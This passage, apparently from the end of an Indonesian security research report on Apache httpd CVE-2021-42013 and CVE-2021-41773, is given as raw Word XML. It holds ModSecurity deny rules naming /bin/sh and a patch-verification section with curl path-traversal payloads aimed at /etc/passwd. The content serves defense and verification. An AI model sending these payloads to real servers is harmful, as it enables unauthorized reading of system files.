    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4A24DC0A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log,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="12E55B16" wp14:textId="2DC0299D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msg:'CVE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42013 Double URL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Encoded Path Traversal Attempt',</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="07E0E34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severity:'CRITICAL',</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="168D1CE6" wp14:textId="2227AE0A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tag:'CVE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42013'"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="40612A3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36B8C83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Rule 2: Blokir akses langsung ke /bin/sh via POST</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="238E6B6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SecRule REQUEST_URI "@contains bin/sh" \</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="36C9E3D8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"chain,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="52A241D9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id:9001002,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="29B2CEC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phase:1,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="595B9E4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deny,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="559D39B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status:403,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="258DA106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    log,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="31D7DAEB" wp14:textId="463740E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   msg:'CVE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42013 RCE via CGI /bin/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sh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Attempt'"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1390395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SecRule REQUEST_METHOD "@streq POST"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="30D7AA69" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="697331DB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21. Patch Verification Procedure</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1109380A" wp14:textId="3CF39B18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Setelah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menerapkan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semua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rekomendasi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lakukan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prosedur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verifikasi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berikut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memastikan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server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tidak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lagi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rentan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terhadap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CVE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2021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42013.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="587A9124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21.1 Verifikasi Versi Apache</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="477A0D2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Cek versi Apache yang terpasang:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="64258A78" wp14:textId="4D231FA3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$ httpd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v</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="40E3C8F1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Server version: Apache/2.4.51 (Unix)    ← Harus 2.4.51 atau lebih baru</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4E7767F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Server built:   Oct  7 2021 14:00:00</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7E72887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4C5886EC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Alternatif:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3A16A1D7" wp14:textId="33FD9DD5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$ apache2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v           # Debian/Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3BAE5BCB" wp14:textId="07435C0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$ rpm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q httpd         # RHEL/CentOS</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="24CFCB9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$ dnf info httpd       # Fedora/RHEL 8+</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7196D064" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="39C5FBF9" wp14:textId="5C775D88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21.2 Test Payload CVE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2021</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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-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 xml:space="preserve">42013 (Harus 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Gagal</w:t>
      </w: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)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5D6ADB8A" wp14:textId="6720D2FE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Test 1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Path Traversal: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harus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return 400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atau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403 (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bukan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200)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4FB3BD40" wp14:textId="2BB4EEC0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$ curl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v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path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as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is \</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="05C2839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'http://TARGET:8080/icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="57E04963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2CDD47BA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Expected response setelah patch:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="42494831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HTTP/1.1 400 Bad Request</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0F33E72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ATAU</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5653387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HTTP/1.1 403 Forbidden</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3F33621D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BUKAN 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4D23D007" wp14:textId="77777777">
      <w:pPr>
        <w:shd w:val="clear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14:paraId="0725626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156C2D7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Expected output setelah patch:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="407AC5E8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# [INF] No results found (not vulnerable)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="29B840A6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77EA7947" wp14:textId="5601D212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# Test 3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CVE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2021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41773 (juga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harus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gagal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):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="394EEC9C" wp14:textId="05EF552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$ curl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v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path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as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is \</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7F6677E7" wp14:textId="3C3F7268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 'http://TARGET:8080/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cgi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bin/.%2e/.%2e/.%2e/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etc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/passwd'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="09D1AEC2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Expected: 400 atau 403</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="34FF1C98" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4B3D1D65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21.3 Verifikasi Konfigurasi Keamanan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="04FBC0A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Cek ServerTokens (harus Prod):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="283FB17A" wp14:textId="5EC8B9B3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 xml:space="preserve">$ curl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I http://TARGET:8080/ | grep Server</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3F3778A7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Server: Apache    ← Versi tidak terekspos (benar)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0DD171FB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191FE566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Cek directory listing (harus disabled):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="613AF8EC" wp14:textId="10B16169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$ curl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s http://TARGET:8080/ | grep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'index of'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="720C7A5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Tidak ada output = directory listing disabled (benar)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1CFE44F5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798B5AE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Cek header keamanan:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1778C50D" wp14:textId="51BA0735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$ curl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I http://TARGET:8080/ | grep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i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 'x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content\|x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frame\|strict'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6DCBD9EB" wp14:textId="68B24252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Content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Type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Options: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nosniff</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="20445F5C" wp14:textId="345308D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Frame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Options: SAMEORIGIN</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3D5FACD5" wp14:textId="2C7B56B6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Strict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Transport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Security: max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</w:rPr>
        <w:t>age=63072000</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="19ADC6D0" wp14:textId="77777777">
      <w:pPr>
        <w:shd w:val="clear" w:fill="1A2332"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="300" w:right="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="9ECE6A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3D94A8CE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Verifikasi mod_cgi status:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7646C066" wp14:textId="7BA69600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$ httpd </w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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-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 xml:space="preserve">M | grep </w:t>
      </w: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cgi</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3FC14AF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Tidak ada output = mod_cgi disabled (benar)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="48B213DB" wp14:textId="77777777">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1A2332"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="300" w:right="300"/>
      </w:pPr>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="9ECE6A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># ATAU jika diperlukan: cgi_module (shared) ← masih aktif, perlu review</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6D072C0D" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="746C8603" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">22. References &amp; Further Reading</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6A8DD83C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22.1 Referensi Utama</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="714CB475" wp14:textId="2E744230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CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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2021</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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42013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NVD National Vulnerability Database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nvd.nist.gov/vuln/detail/CVE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>2021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>42013</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="77912552" wp14:textId="0AB61478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CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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2021</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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41773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NVD National Vulnerability Database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nvd.nist.gov/vuln/detail/CVE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>2021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>41773</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="155442AA" wp14:textId="04F43470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Apache Security Advisory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httpd.apache.org/security/vulnerabilities_24.html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Official Apache security bulletins</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6AB9FE5E" wp14:textId="55BC9568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Apache 2.4.51 Release Notes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httpd.apache.org/changelog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2.4.html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Patch changelog dan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deskripsi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perbaikan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3BA75416" wp14:textId="1383930B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CISA KEV Catalog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cisa.gov/known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>exploited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>vulnerabilities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catalog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CVE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>2021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>41773 &amp; 42013 listing</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="08865FAC" wp14:textId="6C29FC93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Qualys Blog Analysis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blog.qualys.com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Analisis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mendalam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CVE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2021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41773 dan CVE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2021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42013</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="73D6EC36" wp14:textId="56A72F23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pwn0sec Research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pwn0sec.medium.com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Laporan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penemuan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kerentanan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pada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infrastruktur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POLRI</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="21471A3E" wp14:textId="1BB2A022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Ghidra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SRE Framework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ghidra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sre.org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Tool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analisis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biner yang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digunakan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dalam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penelitian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ini</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="48A21919" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="394A2B60" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>22.2 Referensi Teknis Tambahan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="70757610" wp14:textId="6DE1439A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RFC 3986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Uniform Resource Identifier (URI): Generic Syntax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tools.ietf.org/html/rfc3986</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6EFA29F9" wp14:textId="1B6A5BAC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OWASP Path Traversal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owasp.org/www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community/attacks/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Path_Traversal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Dokumentasi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jenis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serangan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="112F4CBD" wp14:textId="7942EFE7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PTES Standard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http://www.pentest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standard.org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Penetration Testing Execution Standard</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7B7F8D01" wp14:textId="24989810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ModSecurity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Documentation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modsecurity.org/documentation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Konfigurasi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WAF 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untuk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Apache</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="46564ACD" wp14:textId="65A054AB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YARA Documentation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virustotal.github.io/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>yara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  <w:lang w:val="en-US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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> YARA rule language reference</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="548110D1" wp14:textId="7722E10D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CIS Apache Benchmark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cisecurity.org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CIS Benchmark for Apache HTTP Server hardening guide</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0BCFF992" wp14:textId="025EAAA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr/>
      </w:pP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NIST SP 800</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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</w:rPr>
        <w:t>44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nvlpubs.nist.gov </w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Guidelines on Securing Public Web Servers</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6BD18F9B" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="238601FE" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0F3CABC7" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5892816E" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D5D8DC" w:sz="4" w:space="8"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">DISCLAIMER &amp; LEGAL NOTICE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="09DF7BD2" wp14:textId="21797CD3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Jurnal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keamanan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ditulis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semata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mata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tujuan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penelitian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keamanan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siber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(security research)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edukasi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Seluruh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pengujian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dilakukan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secara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etis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dengan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mengikuti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prinsip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responsible disclosure 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informasi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temuan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telah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dikirimkan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kepada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pihak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berwenang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sebelum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dipublikasikan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Konten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teknis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dokumen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dimaksudkan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untuk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membantu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administrator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sistem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praktisi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keamanan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peneliti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memahami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mengatasi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kerentanan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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="51E1E4A6" wp14:textId="0FF30689">
      <w:pPr>
        <w:spacing w:before="60" w:after="90"/>
      </w:pP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Penggunaan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teknik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metode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payload, script,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atau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prosedur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didokumentasikan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laporan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terhadap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sistem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komputer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atau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jaringan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tanpa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otorisasi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eksplisit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dari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pemilik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sistem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merupakan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tindakan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ilegal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berdasarkan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Undang</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-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Undang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ITE (UU No. 11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Tahun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2008 jo UU No. 19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Tahun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2016) di Indonesia, Computer Fraud and Abuse Act (CFAA) di Amerika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Serikat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,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regulasi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kejahatan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siber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berlaku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di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yurisdiksi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lainnya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.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Penulis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dan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penerbit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tidak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bertanggung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jawab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atas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penyalahgunaan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informasi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yang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terkandung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dalam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dokumen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 xml:space="preserve"> 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ini</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3CFFFFC7" w:rsidP="3CFFFFC7" w:rsidRDefault="3CFFFFC7" w14:paraId="32FA610B" w14:textId="0BFE16C8">
      <w:pPr>
        <w:spacing w:before="60" w:after="90"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="41FC9987" w:rsidP="3CFFFFC7" w:rsidRDefault="41FC9987" w14:paraId="497EC80B" w14:textId="4988C105">
      <w:pPr>
        <w:spacing w:before="60" w:after="90"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="41FC9987">
        <w:drawing>
          <wp:inline wp14:editId="0314A8A0" wp14:anchorId="1D3AF817">
            <wp:extent cx="5915025" cy="1771650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="956267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267415" name="Picture 956267415"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1912458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CFFFFC7" w14:paraId="17428996" wp14:textId="77777777">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="D5D8DC" w:sz="2" w:space="4"/>
      </w:pBdr>
    </w:pPr>
    <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>pwn0sec Security Research  |  Responsible Disclosure  |  January 2024  |  All rights reserved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3CFFFFC7" w14:paraId="760FCC3B" wp14:textId="1ED09F83">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="1B3A6B" w:sz="4" w:space="4"/>
      </w:pBdr>
    </w:pPr>
    <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">SECURITY RESEARCH </w:t>
    </w:r>
    <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>JOURNAL  |</w:t>
    </w:r>
    <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
      <w:rPr>
